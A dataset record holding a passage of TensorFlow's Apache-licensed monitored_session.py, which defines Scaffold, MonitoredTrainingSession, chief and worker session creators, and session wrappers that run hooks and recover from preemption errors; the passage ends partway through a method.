repo_name
stringlengths 6
100
| path
stringlengths 4
294
| copies
stringlengths 1
5
| size
stringlengths 4
6
| content
stringlengths 606
896k
| license
stringclasses 15
values |
---|---|---|---|---|---|
ZhangXinNan/tensorflow
|
tensorflow/python/training/monitored_session.py
|
11
|
48948
|
# pylint: disable=g-bad-file-header
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A wrapper of Session API which runs hooks."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import sys
import six
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import lookup_ops
from tensorflow.python.ops import resources
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import summary
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import coordinator
from tensorflow.python.training import queue_runner
from tensorflow.python.training import saver as training_saver
from tensorflow.python.training import session_manager as sm
from tensorflow.python.training import session_run_hook
from tensorflow.python.util import function_utils
from tensorflow.python.util.tf_export import tf_export
# The list of exceptions that we should recover from. Exceptions not in this
# list may terminate the job.
_PREEMPTION_ERRORS = (errors.AbortedError, errors.UnavailableError)
# Value that indicates no value was provided.
USE_DEFAULT = object()
@tf_export('train.Scaffold')
class Scaffold(object):
"""Structure to create or gather pieces commonly needed to train a model.
When you build a model for training you usually need ops to initialize
variables, a `Saver` to checkpoint them, an op to collect summaries for
the visualizer, and so on.
Various libraries built on top of the core TensorFlow library take care of
creating some or all of these pieces and storing them in well known
collections in the graph. The `Scaffold` class helps pick these pieces from
the graph collections, creating and adding them to the collections if needed.
If you call the scaffold constructor without any arguments, it will pick
pieces from the collections, creating default ones if needed when
`scaffold.finalize()` is called. You can pass arguments to the constructor to
provide your own pieces. Pieces that you pass to the constructor are not
added to the graph collections.
The following pieces are directly accessible as attributes of the `Scaffold`
object:
* `saver`: A `tf.train.Saver` object taking care of saving the variables.
Picked from and stored into the `SAVERS` collection in the graph by default.
* `init_op`: An op to run to initialize the variables. Picked from and
stored into the `INIT_OP` collection in the graph by default.
* `ready_op`: An op to verify that the variables are initialized. Picked
from and stored into the `READY_OP` collection in the graph by default.
* `ready_for_local_init_op`: An op to verify that global state has been
initialized and it is alright to run `local_init_op`. Picked from and
stored into the `READY_FOR_LOCAL_INIT_OP` collection in the graph by
default. This is needed when the initialization of local variables depends
on the values of global variables.
* `local_init_op`: An op to initialize the local variables. Picked
from and stored into the `LOCAL_INIT_OP` collection in the graph by default.
* `summary_op`: An op to run and merge the summaries in the graph. Picked
from and stored into the `SUMMARY_OP` collection in the graph by default.
* `global_step`: A tensor containing the global step counter. Picked
from and stored into the `GLOBAL_STEP` collection in the graph by default.
You can also pass the following additional pieces to the constructor:
* `init_feed_dict`: A session feed dictionary that should be used when
running the init op.
* `init_fn`: A callable to run after the init op to perform additional
initializations. The callable will be called as
`init_fn(scaffold, session)`.
"""
def __init__(self,
init_op=None,
init_feed_dict=None,
init_fn=None,
ready_op=None,
ready_for_local_init_op=None,
local_init_op=None,
summary_op=None,
saver=None,
copy_from_scaffold=None):
"""Create a scaffold.
Args:
init_op: Optional op for initializing variables.
init_feed_dict: Optional session feed dictionary to use when running the
init_op.
init_fn: Optional function to use to initialize the model after running
the init_op. Will be called as `init_fn(scaffold, session)`.
ready_op: Optional op to verify that the variables are initialized. Must
return an empty 1D string tensor when the variables are initialized, or
a non-empty 1D string tensor listing the names of the non-initialized
variables.
ready_for_local_init_op: Optional op to verify that the global variables
are initialized and `local_init_op` can be run. Must return an empty
1D string tensor when the global variables are initialized, or a
non-empty 1D string tensor listing the names of the non-initialized
global variables.
local_init_op: Optional op to initialize local variables.
summary_op: Optional op to gather all summaries. Must return a scalar
string tensor containing a serialized `Summary` proto.
saver: Optional `tf.train.Saver` object to use to save and restore
variables.
copy_from_scaffold: Optional scaffold object to copy fields from. Its
fields will be overwritten by the provided fields in this function.
"""
if copy_from_scaffold is not None:
if not isinstance(copy_from_scaffold, Scaffold):
raise TypeError('copy_from_scaffold is not a Scaffold instance.')
# We need _coalesce since Tensor is not converted to bool automatically,
# so the common idiom of (a or b) does not work.
coalesce = lambda a, b: a if a is not None else b
init_op = coalesce(init_op, copy_from_scaffold.init_op)
init_feed_dict = coalesce(init_feed_dict,
copy_from_scaffold.init_feed_dict)
# Use the original init_fn provided by the user to init the new Scaffold.
init_fn = coalesce(init_fn, copy_from_scaffold._user_init_fn) # pylint: disable=protected-access
ready_op = coalesce(ready_op, copy_from_scaffold.ready_op)
ready_for_local_init_op = coalesce(
ready_for_local_init_op, copy_from_scaffold.ready_for_local_init_op)
local_init_op = coalesce(local_init_op, copy_from_scaffold.local_init_op)
summary_op = coalesce(summary_op, copy_from_scaffold.summary_op)
saver = coalesce(saver, copy_from_scaffold.saver)
# NOTE(touts): modifying the init function to be passed the scaffold is a
# hack to make it easy to find the saver. Is there a better way?
self._user_init_fn = init_fn
if init_fn:
self._init_fn = lambda sess: init_fn(self, sess)
else:
self._init_fn = None
self._init_op = init_op
self._init_feed_dict = init_feed_dict
self._ready_op = ready_op
self._ready_for_local_init_op = ready_for_local_init_op
self._local_init_op = local_init_op
self._summary_op = summary_op
self._saver = saver
def finalize(self):
"""Creates operations if needed and finalizes the graph."""
if self._init_op is None:
def default_init_op():
return control_flow_ops.group(
variables.global_variables_initializer(),
resources.initialize_resources(resources.shared_resources()))
self._init_op = Scaffold.get_or_default(
'init_op',
ops.GraphKeys.INIT_OP,
default_init_op)
if self._ready_op is None:
def default_ready_op():
return array_ops.concat([
variables.report_uninitialized_variables(),
resources.report_uninitialized_resources()
], 0)
self._ready_op = Scaffold.get_or_default(
'ready_op', ops.GraphKeys.READY_OP,
default_ready_op)
if self._ready_for_local_init_op is None:
def default_ready_for_local_init_op():
return variables.report_uninitialized_variables(
variables.global_variables())
self._ready_for_local_init_op = Scaffold.get_or_default(
'ready_for_local_init_op', ops.GraphKeys.READY_FOR_LOCAL_INIT_OP,
default_ready_for_local_init_op)
if self._local_init_op is None:
self._local_init_op = Scaffold.get_or_default(
'local_init_op', ops.GraphKeys.LOCAL_INIT_OP,
Scaffold.default_local_init_op)
if self._summary_op is None:
self._summary_op = Scaffold.get_or_default('summary_op',
ops.GraphKeys.SUMMARY_OP,
summary.merge_all)
# pylint: disable=g-long-lambda
if self._saver is None:
self._saver = training_saver._get_saver_or_default() # pylint: disable=protected-access
# pylint: enable=g-long-lambda
self._saver.build()
ops.get_default_graph().finalize()
logging.info('Graph was finalized.')
return self
@property
def init_fn(self):
return self._init_fn
@property
def init_op(self):
return self._init_op
@property
def ready_op(self):
return self._ready_op
@property
def ready_for_local_init_op(self):
return self._ready_for_local_init_op
@property
def local_init_op(self):
return self._local_init_op
@property
def summary_op(self):
return self._summary_op
@property
def saver(self):
return self._saver
@property
def init_feed_dict(self):
return self._init_feed_dict
@staticmethod
def get_or_default(arg_name, collection_key, default_constructor):
"""Get from cache or create a default operation."""
elements = ops.get_collection(collection_key)
if elements:
if len(elements) > 1:
raise RuntimeError('More than one item in the collection "%s". '
'Please indicate which one to use by passing it to '
'the tf.Scaffold constructor as: '
'tf.Scaffold(%s=item to use)', collection_key,
arg_name)
return elements[0]
op = default_constructor()
if op is not None:
ops.add_to_collection(collection_key, op)
return op
@staticmethod
def default_local_init_op():
"""Returns an op that groups the default local init ops.
This op is used during session initialization when a Scaffold is
initialized without specifying the local_init_op arg. It includes
`tf.local_variables_initializer`, `tf.tables_initializer`, and also
initializes local session resources.
Returns:
The default Scaffold local init op.
"""
return control_flow_ops.group(
variables.local_variables_initializer(),
lookup_ops.tables_initializer(),
resources.initialize_resources(resources.local_resources()))
@tf_export('train.MonitoredTrainingSession')
def MonitoredTrainingSession(master='', # pylint: disable=invalid-name
is_chief=True,
checkpoint_dir=None,
scaffold=None,
hooks=None,
chief_only_hooks=None,
save_checkpoint_secs=USE_DEFAULT,
save_summaries_steps=USE_DEFAULT,
save_summaries_secs=USE_DEFAULT,
config=None,
stop_grace_period_secs=120,
log_step_count_steps=100,
max_wait_secs=7200,
save_checkpoint_steps=USE_DEFAULT,
summary_dir=None):
"""Creates a `MonitoredSession` for training.
For a chief, this utility sets proper session initializer/restorer. It also
creates hooks related to checkpoint and summary saving. For workers, this
utility sets proper session creator which waits for the chief to
initialize/restore. Please check `tf.train.MonitoredSession` for more
information.
Args:
master: `String` the TensorFlow master to use.
is_chief: If `True`, it will take care of initialization and recovery the
underlying TensorFlow session. If `False`, it will wait on a chief to
initialize or recover the TensorFlow session.
checkpoint_dir: A string. Optional path to a directory where to restore
variables.
scaffold: A `Scaffold` used for gathering or building supportive ops. If
not specified, a default one is created. It's used to finalize the graph.
hooks: Optional list of `SessionRunHook` objects.
chief_only_hooks: list of `SessionRunHook` objects. Activate these hooks if
`is_chief==True`, ignore otherwise.
save_checkpoint_secs: The frequency, in seconds, that a checkpoint is saved
using a default checkpoint saver. If both `save_checkpoint_steps` and
`save_checkpoint_secs` are set to `None`, then the default checkpoint
saver isn't used. If both are provided, then only `save_checkpoint_secs`
is used. Default 600.
save_summaries_steps: The frequency, in number of global steps, that the
summaries are written to disk using a default summary saver. If both
`save_summaries_steps` and `save_summaries_secs` are set to `None`, then
the default summary saver isn't used. Default 100.
save_summaries_secs: The frequency, in secs, that the summaries are written
to disk using a default summary saver. If both `save_summaries_steps` and
`save_summaries_secs` are set to `None`, then the default summary saver
isn't used. Default not enabled.
config: an instance of `tf.ConfigProto` proto used to configure the session.
It's the `config` argument of constructor of `tf.Session`.
stop_grace_period_secs: Number of seconds given to threads to stop after
`close()` has been called.
log_step_count_steps: The frequency, in number of global steps, that the
global step/sec is logged.
max_wait_secs: Maximum time workers should wait for the session to
become available. This should be kept relatively short to help detect
incorrect code, but sometimes may need to be increased if the chief takes
a while to start up.
save_checkpoint_steps: The frequency, in number of global steps, that a
checkpoint is saved using a default checkpoint saver. If both
`save_checkpoint_steps` and `save_checkpoint_secs` are set to `None`, then
the default checkpoint saver isn't used. If both are provided, then only
`save_checkpoint_secs` is used. Default not enabled.
summary_dir: A string. Optional path to a directory where to
save summaries. If None, checkpoint_dir is used instead.
Returns:
A `MonitoredSession` object.
"""
if save_summaries_steps == USE_DEFAULT and save_summaries_secs == USE_DEFAULT:
save_summaries_steps = 100
save_summaries_secs = None
elif save_summaries_secs == USE_DEFAULT:
save_summaries_secs = None
elif save_summaries_steps == USE_DEFAULT:
save_summaries_steps = None
if (save_checkpoint_steps == USE_DEFAULT and
save_checkpoint_secs == USE_DEFAULT):
save_checkpoint_steps = None
save_checkpoint_secs = 600
elif save_checkpoint_secs == USE_DEFAULT:
save_checkpoint_secs = None
elif save_checkpoint_steps == USE_DEFAULT:
save_checkpoint_steps = None
scaffold = scaffold or Scaffold()
if not is_chief:
session_creator = WorkerSessionCreator(
scaffold=scaffold,
master=master,
config=config,
max_wait_secs=max_wait_secs)
return MonitoredSession(session_creator=session_creator, hooks=hooks or [],
stop_grace_period_secs=stop_grace_period_secs)
all_hooks = []
if chief_only_hooks:
all_hooks.extend(chief_only_hooks)
session_creator = ChiefSessionCreator(
scaffold=scaffold,
checkpoint_dir=checkpoint_dir,
master=master,
config=config)
summary_dir = summary_dir or checkpoint_dir
if summary_dir:
if log_step_count_steps and log_step_count_steps > 0:
all_hooks.append(
basic_session_run_hooks.StepCounterHook(
output_dir=summary_dir, every_n_steps=log_step_count_steps))
if (save_summaries_steps and save_summaries_steps > 0) or (
save_summaries_secs and save_summaries_secs > 0):
all_hooks.append(basic_session_run_hooks.SummarySaverHook(
scaffold=scaffold,
save_steps=save_summaries_steps,
save_secs=save_summaries_secs,
output_dir=summary_dir))
if checkpoint_dir:
if (save_checkpoint_secs and save_checkpoint_secs > 0) or (
save_checkpoint_steps and save_checkpoint_steps > 0):
all_hooks.append(basic_session_run_hooks.CheckpointSaverHook(
checkpoint_dir,
save_steps=save_checkpoint_steps,
save_secs=save_checkpoint_secs,
scaffold=scaffold))
if hooks:
all_hooks.extend(hooks)
return MonitoredSession(session_creator=session_creator, hooks=all_hooks,
stop_grace_period_secs=stop_grace_period_secs)
@tf_export('train.SessionCreator')
class SessionCreator(object):
"""A factory for tf.Session."""
@abc.abstractmethod
def create_session(self):
raise NotImplementedError(
'create_session is not implemented for {}.'.format(self))
@tf_export('train.ChiefSessionCreator')
class ChiefSessionCreator(SessionCreator):
"""Creates a tf.Session for a chief."""
def __init__(self,
scaffold=None,
master='',
config=None,
checkpoint_dir=None,
checkpoint_filename_with_path=None):
"""Initializes a chief session creator.
Args:
scaffold: A `Scaffold` used for gathering or building supportive ops. If
not specified a default one is created. It's used to finalize the graph.
master: `String` representation of the TensorFlow master to use.
config: `ConfigProto` proto used to configure the session.
checkpoint_dir: A string. Optional path to a directory where to restore
variables.
checkpoint_filename_with_path: Full file name path to the checkpoint file.
"""
self._checkpoint_dir = checkpoint_dir
self._checkpoint_filename_with_path = checkpoint_filename_with_path
self._scaffold = scaffold or Scaffold()
self._session_manager = None
self._master = master
self._config = config
def _get_session_manager(self):
if self._session_manager:
return self._session_manager
self._session_manager = sm.SessionManager(
local_init_op=self._scaffold.local_init_op,
ready_op=self._scaffold.ready_op,
ready_for_local_init_op=self._scaffold.ready_for_local_init_op,
graph=ops.get_default_graph())
return self._session_manager
def create_session(self):
self._scaffold.finalize()
return self._get_session_manager().prepare_session(
self._master,
saver=self._scaffold.saver,
checkpoint_dir=self._checkpoint_dir,
checkpoint_filename_with_path=self._checkpoint_filename_with_path,
config=self._config,
init_op=self._scaffold.init_op,
init_feed_dict=self._scaffold.init_feed_dict,
init_fn=self._scaffold.init_fn)
@tf_export('train.WorkerSessionCreator')
class WorkerSessionCreator(SessionCreator):
"""Creates a tf.Session for a worker."""
def __init__(self,
scaffold=None,
master='',
config=None,
max_wait_secs=30 * 60):
"""Initializes a worker session creator.
Args:
scaffold: A `Scaffold` used for gathering or building supportive ops. If
not specified a default one is created. It's used to finalize the graph.
master: `String` representation of the TensorFlow master to use.
config: `ConfigProto` proto used to configure the session.
max_wait_secs: Maximum time to wait for the session to become available.
"""
self._scaffold = scaffold or Scaffold()
self._session_manager = None
self._master = master
self._config = config
self._max_wait_secs = max_wait_secs
def _get_session_manager(self):
if self._session_manager:
return self._session_manager
self._session_manager = sm.SessionManager(
local_init_op=self._scaffold.local_init_op,
ready_op=self._scaffold.ready_op,
ready_for_local_init_op=self._scaffold.ready_for_local_init_op,
graph=ops.get_default_graph())
return self._session_manager
def create_session(self):
self._scaffold.finalize()
return self._get_session_manager().wait_for_session(
self._master, config=self._config,
max_wait_secs=self._max_wait_secs
)
class _MonitoredSession(object):
"""See `MonitoredSession` or `SingularMonitoredSession`."""
def __init__(self, session_creator, hooks, should_recover,
stop_grace_period_secs=120):
"""Sets up a Monitored or Hooked Session.
Args:
session_creator: A factory object to create session. Typically a
`ChiefSessionCreator` or a `WorkerSessionCreator`.
hooks: An iterable of `SessionRunHook' objects.
should_recover: A bool. Indicates whether to recover from `AbortedError`
and `UnavailableError` or not.
stop_grace_period_secs: Number of seconds given to threads to stop after
`close()` has been called.
"""
self._graph_was_finalized = ops.get_default_graph().finalized
self._hooks = hooks or []
for h in self._hooks:
h.begin()
# Create the session.
self._coordinated_creator = self._CoordinatedSessionCreator(
session_creator=session_creator or ChiefSessionCreator(),
hooks=self._hooks,
stop_grace_period_secs=stop_grace_period_secs)
if should_recover:
self._sess = _RecoverableSession(self._coordinated_creator)
else:
self._sess = self._coordinated_creator.create_session()
@property
def graph(self):
"""The graph that was launched in this session."""
if self._tf_sess() is None:
return None
return self._tf_sess().graph
def run(self, fetches, feed_dict=None, options=None, run_metadata=None):
"""Run ops in the monitored session.
This method is completely compatible with the `tf.Session.run()` method.
Args:
fetches: Same as `tf.Session.run()`.
feed_dict: Same as `tf.Session.run()`.
options: Same as `tf.Session.run()`.
run_metadata: Same as `tf.Session.run()`.
Returns:
Same as `tf.Session.run()`.
"""
return self._sess.run(fetches,
feed_dict=feed_dict,
options=options,
run_metadata=run_metadata)
def run_step_fn(self, step_fn):
"""Run ops using a step function.
Args:
step_fn: A function or a method with a single argument of type
`StepContext`. The function may use methods of the argument to
perform computations with access to a raw session.
The returned value of the `step_fn` will be returned from `run_step_fn`,
unless a stop is requested. In that case, the next `should_stop` call
will return True.
Example usage:
```python
with tf.Graph().as_default():
c = tf.placeholder(dtypes.float32)
v = tf.add(c, 4.0)
w = tf.add(c, 0.5)
def step_fn(step_context):
a = step_context.session.run(fetches=v, feed_dict={c: 0.5})
if a <= 4.5:
step_context.request_stop()
return step_context.run_with_hooks(fetches=w, feed_dict={c: 0.1})
with tf.MonitoredSession() as session:
while not session.should_stop():
a = session.run_step_fn(step_fn)
```
Hooks interact with the `run_with_hooks()` call inside the `step_fn`
as they do with a `MonitoredSession.run` call.
Returns:
Returns the returned value of `step_fn`.
Raises:
StopIteration: if `step_fn` has called `request_stop()`. It may be
caught by `with tf.MonitoredSession()` to close the session.
ValueError: if `step_fn` doesn't have a single argument called
`step_context`. It may also optionally have `self` for cases when it
belongs to an object.
"""
step_fn_arguments = function_utils.fn_args(step_fn)
if step_fn_arguments != ('step_context',) and step_fn_arguments != (
'self',
'step_context',
):
raise ValueError(
'`step_fn` may either have one `step_context` argument, or'
' `self` and `step_context` arguments if it\'s an instance'
' method. Got {} instead.'.format(step_fn_arguments))
# `self._sess` is either `_RecoverableSession` or a `_CoordinatedSession`.
# Setting `run_with_hooks` to `None` will cause `run_with_hooks` to be
# `_CoordinatedSession.run` downstream in either case. This allows
# `_PREEMPTION_ERRORS` to propage from within `step_fn` to
# `_RecoverableSession.run_step_fn`.
return self._sess.run_step_fn(step_fn, self._tf_sess(), run_with_hooks=None)
class StepContext(object):
"""Control flow instrument for the `step_fn` from `run_step_fn()`.
Users of `step_fn` may perform `run()` calls without running hooks
by accessing the `session`. A `run()` call with hooks may be performed
using `run_with_hooks()`. Computation flow can be interrupted using
`request_stop()`.
"""
def __init__(self, session, run_with_hooks_fn):
"""Initializes the `step_context` argument for a `step_fn` invocation.
Args:
session: An instance of `tf.Session`.
run_with_hooks_fn: A function for running fetches and hooks.
"""
self._session = session
self._run_with_hooks_fn = run_with_hooks_fn
@property
def session(self):
return self._session
def run_with_hooks(self, *args, **kwargs):
"""Same as `MonitoredSession.run`. Accepts the same arguments."""
return self._run_with_hooks_fn(*args, **kwargs)
def request_stop(self):
"""Exit the training loop by causing `should_stop()` to return `True`.
Causes `step_fn` to exit by raising an exception.
Raises:
StopIteration
"""
raise StopIteration('step_fn has requested the iterations to stop.')
def should_stop(self):
return self._sess is None or self._sess.should_stop()
def close(self):
self._close_internal()
def __enter__(self):
return self
def __exit__(self, exception_type, exception_value, traceback):
if exception_type in [errors.OutOfRangeError, StopIteration]:
exception_type = None
self._close_internal(exception_type)
# __exit__ should return True to suppress an exception.
return exception_type is None
class _CoordinatedSessionCreator(SessionCreator):
"""Factory for the _RecoverableSession."""
def __init__(self, session_creator, hooks, stop_grace_period_secs):
self._session_creator = session_creator
self._hooks = hooks
self.coord = None
self.tf_sess = None
self._stop_grace_period_secs = stop_grace_period_secs
def create_session(self):
"""Creates a coordinated session."""
# Keep the tf_sess for unit testing.
self.tf_sess = self._session_creator.create_session()
# We don't want coordinator to suppress any exception.
self.coord = coordinator.Coordinator(clean_stop_exception_types=[])
queue_runner.start_queue_runners(sess=self.tf_sess, coord=self.coord)
# Inform the hooks that a new session has been created.
for hook in self._hooks:
hook.after_create_session(self.tf_sess, self.coord)
return _CoordinatedSession(
_HookedSession(self.tf_sess, self._hooks), self.coord,
self._stop_grace_period_secs)
def _close_internal(self, exception_type=None):
try:
if not exception_type:
for h in self._hooks:
h.end(self._coordinated_creator.tf_sess)
finally:
try:
if self._sess is None:
raise RuntimeError('Session is already closed.')
self._sess.close()
finally:
self._sess = None
self._coordinated_creator.tf_sess = None
self._coordinated_creator.coord = None
if not self._graph_was_finalized:
ops.get_default_graph()._unsafe_unfinalize() # pylint: disable=protected-access
def _is_closed(self):
"""Return True if the monitored session is closed. For tests only.
Returns:
A boolean.
"""
return self._coordinated_creator.tf_sess is None
def _tf_sess(self):
return self._coordinated_creator.tf_sess
@tf_export('train.MonitoredSession')
class MonitoredSession(_MonitoredSession):
"""Session-like object that handles initialization, recovery and hooks.
Example usage:
```python
saver_hook = CheckpointSaverHook(...)
summary_hook = SummarySaverHook(...)
with MonitoredSession(session_creator=ChiefSessionCreator(...),
hooks=[saver_hook, summary_hook]) as sess:
while not sess.should_stop():
sess.run(train_op)
```
Initialization: At creation time the monitored session does following things
in given order:
* calls `hook.begin()` for each given hook
* finalizes the graph via `scaffold.finalize()`
* create session
* initializes the model via initialization ops provided by `Scaffold`
* restores variables if a checkpoint exists
* launches queue runners
* calls `hook.after_create_session()`
Run: When `run()` is called, the monitored session does following things:
* calls `hook.before_run()`
* calls TensorFlow `session.run()` with merged fetches and feed_dict
* calls `hook.after_run()`
* returns result of `session.run()` asked by user
* if `AbortedError` or `UnavailableError` occurs, it recovers or
reinitializes the session before executing the run() call again
Exit: At the `close()`, the monitored session does following things in order:
* calls `hook.end()`
* closes the queue runners and the session
* suppresses `OutOfRange` error which indicates that all inputs have been
processed if the monitored_session is used as a context
How to set `tf.Session` arguments:
* In most cases you can set session arguments as follows:
```python
MonitoredSession(
session_creator=ChiefSessionCreator(master=..., config=...))
```
* In distributed setting for a non-chief worker, you can use following:
```python
MonitoredSession(
session_creator=WorkerSessionCreator(master=..., config=...))
```
See `MonitoredTrainingSession` for an example usage based on chief or worker.
Note: This is not a `tf.Session`. For example, it cannot do following:
* it cannot be set as default session.
* it cannot be sent to saver.save.
* it cannot be sent to tf.train.start_queue_runners.
Args:
session_creator: A factory object to create session. Typically a
`ChiefSessionCreator` which is the default one.
hooks: An iterable of `SessionRunHook' objects.
Returns:
A MonitoredSession object.
"""
def __init__(self, session_creator=None, hooks=None,
stop_grace_period_secs=120):
super(MonitoredSession, self).__init__(
session_creator, hooks, should_recover=True,
stop_grace_period_secs=stop_grace_period_secs)
@tf_export('train.SingularMonitoredSession')
class SingularMonitoredSession(_MonitoredSession):
"""Session-like object that handles initialization, restoring, and hooks.
Please note that this utility is not recommended for distributed settings.
For distributed settings, please use `tf.train.MonitoredSession`. The
differences between `MonitoredSession` and `SingularMonitoredSession` are:
* `MonitoredSession` handles `AbortedError` and `UnavailableError` for
distributed settings, but `SingularMonitoredSession` does not.
* `MonitoredSession` can be created in `chief` or `worker` modes.
`SingularMonitoredSession` is always created as `chief`.
* You can access the raw `tf.Session` object used by
`SingularMonitoredSession`, whereas in MonitoredSession the raw session is
private. This can be used:
- To `run` without hooks.
- To save and restore.
* All other functionality is identical.
Example usage:
```python
saver_hook = CheckpointSaverHook(...)
summary_hook = SummarySaverHook(...)
with SingularMonitoredSession(hooks=[saver_hook, summary_hook]) as sess:
while not sess.should_stop():
sess.run(train_op)
```
Initialization: At creation time the hooked session does following things
in given order:
* calls `hook.begin()` for each given hook
* finalizes the graph via `scaffold.finalize()`
* create session
* initializes the model via initialization ops provided by `Scaffold`
* restores variables if a checkpoint exists
* launches queue runners
Run: When `run()` is called, the hooked session does following things:
* calls `hook.before_run()`
* calls TensorFlow `session.run()` with merged fetches and feed_dict
* calls `hook.after_run()`
* returns result of `session.run()` asked by user
Exit: At the `close()`, the hooked session does following things in order:
* calls `hook.end()`
* closes the queue runners and the session
* suppresses `OutOfRange` error which indicates that all inputs have been
processed if the `SingularMonitoredSession` is used as a context.
"""
def __init__(self,
hooks=None,
scaffold=None,
master='',
config=None,
checkpoint_dir=None,
stop_grace_period_secs=120,
checkpoint_filename_with_path=None):
"""Creates a SingularMonitoredSession.
Args:
hooks: An iterable of `SessionRunHook' objects.
scaffold: A `Scaffold` used for gathering or building supportive ops. If
not specified a default one is created. It's used to finalize the graph.
master: `String` representation of the TensorFlow master to use.
config: `ConfigProto` proto used to configure the session.
checkpoint_dir: A string. Optional path to a directory where to restore
variables.
stop_grace_period_secs: Number of seconds given to threads to stop after
`close()` has been called.
checkpoint_filename_with_path: A string. Optional path to a checkpoint
file from which to restore variables.
"""
session_creator = ChiefSessionCreator(
scaffold=scaffold,
master=master,
config=config,
checkpoint_dir=checkpoint_dir,
checkpoint_filename_with_path=checkpoint_filename_with_path)
super(SingularMonitoredSession, self).__init__(
session_creator, hooks, should_recover=False,
stop_grace_period_secs=stop_grace_period_secs)
def raw_session(self):
"""Returns underlying `TensorFlow.Session` object."""
return self._tf_sess()
class _WrappedSession(object):
"""Wrapper around a `tf.Session`.
This wrapper is used as a base class for various session wrappers
that provide additional functionality such as monitoring, coordination,
and recovery.
In addition to the methods exported by `SessionInterface` the wrapper
provides a method to check for stop and never raises exceptions from
calls to `close()`.
"""
def __init__(self, sess):
"""Creates a `_WrappedSession`.
Args:
sess: A `tf.Session` or `_WrappedSession` object. The wrapped session.
"""
self._sess = sess
self._wrapped_is_stoppable = isinstance(self._sess, _WrappedSession)
@property
def graph(self):
return self._sess.graph
@property
def sess_str(self):
return self._sess.sess_str
def should_stop(self):
"""Return true if this session should not be used anymore.
Always return True if the session was closed.
Returns:
True if the session should stop, False otherwise.
"""
if self._check_stop():
return True
if self._sess:
return self._wrapped_is_stoppable and self._sess.should_stop()
return True
def _check_stop(self):
"""Hook for subclasses to provide their own stop condition.
Returns:
True if the session should stop, False otherwise.
"""
return False
def close(self):
if self._sess:
try:
self._sess.close()
except _PREEMPTION_ERRORS:
pass
finally:
self._sess = None
def run(self, *args, **kwargs):
return self._sess.run(*args, **kwargs)
def run_step_fn(self, step_fn, raw_session, run_with_hooks):
# `_RecoverableSession` sets `run_with_hooks` to `_CoordinatedSession.run`.
# It is `None` when called from `_CoordinatedSession`. In that case
# `self.run` is `_CoordinatedSession.run`.
run_with_hooks = run_with_hooks or self.run
return step_fn(_MonitoredSession.StepContext(raw_session, run_with_hooks))
class _RecoverableSession(_WrappedSession):
"""A wrapped session that recreates a session upon certain kinds of errors.
The constructor is passed a SessionCreator object, not a session.
Calls to `run()` are delegated to the wrapped session. If a call raises the
exception `tf.errors.AbortedError` or `tf.errors.UnavailableError`, the
wrapped session is closed, and a new one is created by calling the factory
again.
"""
def __init__(self, sess_creator):
"""Create a new `_RecoverableSession`.
The value returned by calling `sess_creator.create_session()` will be the
session wrapped by this recoverable session.
Args:
sess_creator: A 'SessionCreator' to be wrapped by recoverable.
"""
self._sess_creator = sess_creator
_WrappedSession.__init__(self, self._create_session())
def _create_session(self):
while True:
try:
return self._sess_creator.create_session()
except _PREEMPTION_ERRORS as e:
logging.info('An error was raised while a session was being created. '
'This may be due to a preemption of a connected worker '
'or parameter server. A new session will be created. '
'Error: %s', e)
def _check_stop(self):
try:
if self._sess:
return self._sess._check_stop() # pylint: disable=protected-access
else:
return True
except _PREEMPTION_ERRORS as e:
logging.info('An error was raised while considering whether the '
'session is complete. This may be due to a preemption in '
'a connected worker or parameter server. The current '
'session will be closed and a new session will be '
'created. Error: %s', e)
self.close()
self._sess = self._create_session()
# Since we have just recreated the session, the overall computation should
# not stop:
return False
except Exception: # pylint: disable=broad-except
# `should_stop` should return True instead of raising an exception.
return True
def run(self, fetches, feed_dict=None, options=None, run_metadata=None):
while True:
try:
if not self._sess:
self._sess = self._create_session()
return self._sess.run(fetches,
feed_dict=feed_dict,
options=options,
run_metadata=run_metadata)
except _PREEMPTION_ERRORS as e:
logging.info('An error was raised. This may be due to a preemption in '
'a connected worker or parameter server. The current '
'session will be closed and a new session will be '
'created. Error: %s', e)
self.close()
self._sess = None
def run_step_fn(self, step_fn, raw_session, run_with_hooks):
while True:
try:
if not self._sess:
self._sess = self._create_session()
run_with_hooks = self._sess.run
return self._sess.run_step_fn(step_fn, raw_session, run_with_hooks)
except _PREEMPTION_ERRORS as e:
logging.info('An error was raised. This may be due to a preemption in '
'a connected worker or parameter server. The current '
'session will be closed and a new session will be '
'created. Error: %s', e)
self.close()
self._sess = None
class _CoordinatedSession(_WrappedSession):
"""A wrapped session that works with a `tf.Coordinator`.
Calls to `run()` are delegated to the wrapped session. If a call
raises an exception, the exception is reported to the coordinator.
In addition, after each call to `run()` this session ask the coordinator if
the session should stop. In that case it will will join all the threads
registered with the coordinator before returning.
If the coordinator was requested to stop with an exception, that exception
will be re-raised from the call to `run()`.
"""
def __init__(self, sess, coord, stop_grace_period_secs=120):
"""Create a new `_CoordinatedSession`.
Args:
sess: A `tf.Session` object. The wrapped session.
coord: A `tf.train.Coordinator` object.
stop_grace_period_secs: Number of seconds given to threads to stop after
`close()` has been called.
"""
_WrappedSession.__init__(self, sess)
self._coord = coord
self._stop_grace_period_secs = stop_grace_period_secs
def _check_stop(self):
# If the coordinator was asked to stop due to an exception, then it needs
# to be propagated to this stack.
self._coord.raise_requested_exception()
# At this point, no exceptions are recorded in the coordinator.
return self._coord.should_stop()
def close(self):
self._coord.request_stop()
try:
self._coord.join(
stop_grace_period_secs=self._stop_grace_period_secs,
ignore_live_threads=True)
finally:
try:
_WrappedSession.close(self)
except Exception: # pylint: disable=broad-except
# We intentionally suppress exceptions from the close() here since
# useful exceptions are already reported by join().
pass
def run(self, *args, **kwargs):
try:
return self._sess.run(*args, **kwargs)
except _PREEMPTION_ERRORS:
raise
except Exception: # pylint: disable=broad-except
